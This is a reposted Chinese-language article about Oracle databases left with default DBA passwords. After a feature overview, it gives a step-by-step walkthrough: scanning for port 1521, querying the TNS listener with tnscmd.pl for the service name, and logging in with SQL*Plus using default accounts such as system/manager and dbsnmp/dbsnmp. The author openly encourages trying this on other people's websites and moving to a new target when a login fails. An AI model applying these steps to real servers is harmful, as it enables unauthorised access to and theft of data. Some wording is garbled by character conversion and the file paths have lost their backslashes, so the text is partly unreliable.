Oracle數據庫中存在默認密碼威脅
2024-08-29 13:33:04
供稿:網友
Oracle數據庫是現在很流行的數據庫系統,很多大型網站都采用Oracle,它之所以倍受用戶喜愛是因為它有以下突出的特點: 1、支持大數據庫、多用戶的高性能的事務處理。Oracle支持最大數據庫,其大小可到幾百千兆,可充分利用硬件設備。支持大量用戶同時在同一數據上執行各種數據應用,并使數據爭用最小,保證數據一致性。系統維護具有高的性能,Oracle天天可連續24小時工作,正常的系統操作(后備或個別計算機系統故障)不會中斷數據庫的使用。可控制數據庫數據的可用性,可在數據庫級或在子數據庫級上控制。2、Oracle遵守數據存取語言、操作系統、用戶接口和網絡通信協議的工業標準。所以它是一個開放系統,保護了用戶的投資。美國標準化和技術研究所(NIST)對Oracle7 SERVER進行檢驗,100%地與ANSI/ISO SQL89標準的二級相兼容。3、實施安全性控制和完整性控制。Oracle為限制各監控數據存取提供系統可靠的安全性。Oracle實施數據完整性,為可接受的數據指定標準。4、支持分布式數據庫和分布處理。Oracle為了充分利用計算機系統和網絡,答應將處理分為數據庫服務器和客戶應用程序,所有共享的數據治理由數據庫治理系統的計算機處理,而運行數據庫應用的工作站集中于解釋和顯示數據。通過網絡連接的計算機環境,Oracle將存放在多臺計算機上的數據組合成一個邏輯數據庫,可被全部網絡用戶存取。分布式系統像集中式數據庫一樣具有透明性和數據一致性。具有可移植性、可兼容性和可連接性。由于Oracle軟件可在許多不同的操作系統上運行,以致Oracle上所開發的應用可移植到任何操作系統,只需很少修改或不需修改。Oracle軟件同工業標準相兼容,包括很多工業標準的操作系統,所開發應用系統可在任何操作系統上運行。可連接性是指ORALCE答應不同類型的計算機和操作系統通過網絡可共享信息。雖然Oracle數據庫具有很高的安全性,但是假如我們在配置的時候不注重安全意識,那么也是很危險的。也就是說,安全最主要的還是要靠人自己,而不能過分依靠軟件來實現。我們知道,在MSSQL中,安裝完成后默認有個sa的登陸密碼為空,假如不更改就會產生安全漏洞。那么oracle呢?也有的。為了安裝和調試的方便,Oracle數據庫中的兩個具有DBA權限的用戶Sys和System的缺省密碼是manager。筆者發現很多國內網站的Oracle數據庫沒有更改這兩個用戶的密碼,其中也包括很多大型的電子商務網站, 我們就可以利用這個缺省密碼去找我們感愛好的東西。如何實現,看下面的文章吧。進行測試前我們先來了解一些相關的知識,我們連接一個Oracle數據庫的時候,需要知道它的service_name或者是Sid值,就象mssql一樣,需要知道數據庫名。那如何去知道呢,猜?呵呵,顯然是不行的。這里我們先講講oracle的TNS listener,它位于數據庫Client和數據庫Server之間,默認監聽1521端口,這個監聽端口是可以更改的。但是假如你用一個tcp的session去連接1521端口的話,oracle將不會返回它的banner,假如你輸入一些東西的話,它甚至有可能把你踢出去。這里我們就需要用tnscmd.pl這個perl程序了,它可以查詢遠程oracle數據庫是否開啟(也就是ping了),查詢版本,以及查詢它的服務名,服務狀態和數據庫服務名,而且正確率很高。理論方面的講完了,假如還有什么不懂的可以去查找相關資料。現在開始測試吧,需要的工具有:ActivePerl,Oracle客戶端,Superscan或者是其它掃描端口的軟件, Tnscmd.pl。我們先用Superscan掃描開放了端口1521的主機,假設其ip是xx.xx.110.110,這樣目標已經有了。然后我們要做的就是用Tnscmd.pl來查詢遠程數據庫的服務名了,Tnscmd.pl的用法如下: C:perlbin>perl tnscmd.plusage: tnscmd.pl [command] -h hostnamewhere 'command' is something like ping, version, status, etc.(default is ping)[-p port] - alternate TCP port to use (default is 1521)[--logfile logfile] - write raw packets to specified logfile[--indent] - indent & outdent on parens[--rawcmd command] - build your own CONNECT_DATA string[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
我們下面用的只有簡單的幾個命令,其他的命令也很好用,一起去發掘吧。然后我們就這樣來: C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indentsending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521writing 91 bytesreading._.......6.........?. ..........DESCRIPTION=TMP=VSNNUM=135286784ERR=0SERVICES_EXIST=1.Q........SERVICE=SERVICE_NAME=ORCLINSTANCE=INSTANCE_NAME=ORCLNUM=1INSTANCE_CLASS=ORACLEHANDLER=HANDLER_DISPLAY=DEDICATED SERVERSTA=readyHANDLER_INFO=LOCAL SERVERHANDLER_MAXLOAD=0HANDLER_LOAD=0ESTABLISHED=447278REFUSED=0HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227HANDLER_NAME=DEDICATEDADDRESS=PROTOCOL=beqPROGRAM=/home/oracle/bin/oracleENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'ARGV0=oracleORCLARGS='LOCAL=NO'.........@
從上面得到的信息我們可以看出數據庫的服務名為ORCL,然后我們就可以通過sqlplus工具來遠程連上它了,用戶名和密碼我們用默認的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,這個默認用戶和密碼是隨版本的不同而改變的。如下: C:oracleora90BIN>sqlplus /nologSQL*Plus: Release 9.0.1.0.1 - ProdUCtion on Thu May 23 11:36:59 2002(c) Copyright 2001 Oracle Corporation. All rights reserved.SQL>connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=xx.xx.110.110)(port=1521)))(connect_data=(SERVICE_NAME=ORCL))); 假如密碼正確,那么就會提示connected,假如不行,再換別的默認用戶名和密碼。經過筆者的嘗試一般用dbsnmp/dbsnmp都能進去。當然假如對方已經把默認密碼改了,那我們只能換別的目標了。但是我發現很多都是不改的,這個就是安全意識的問題了。
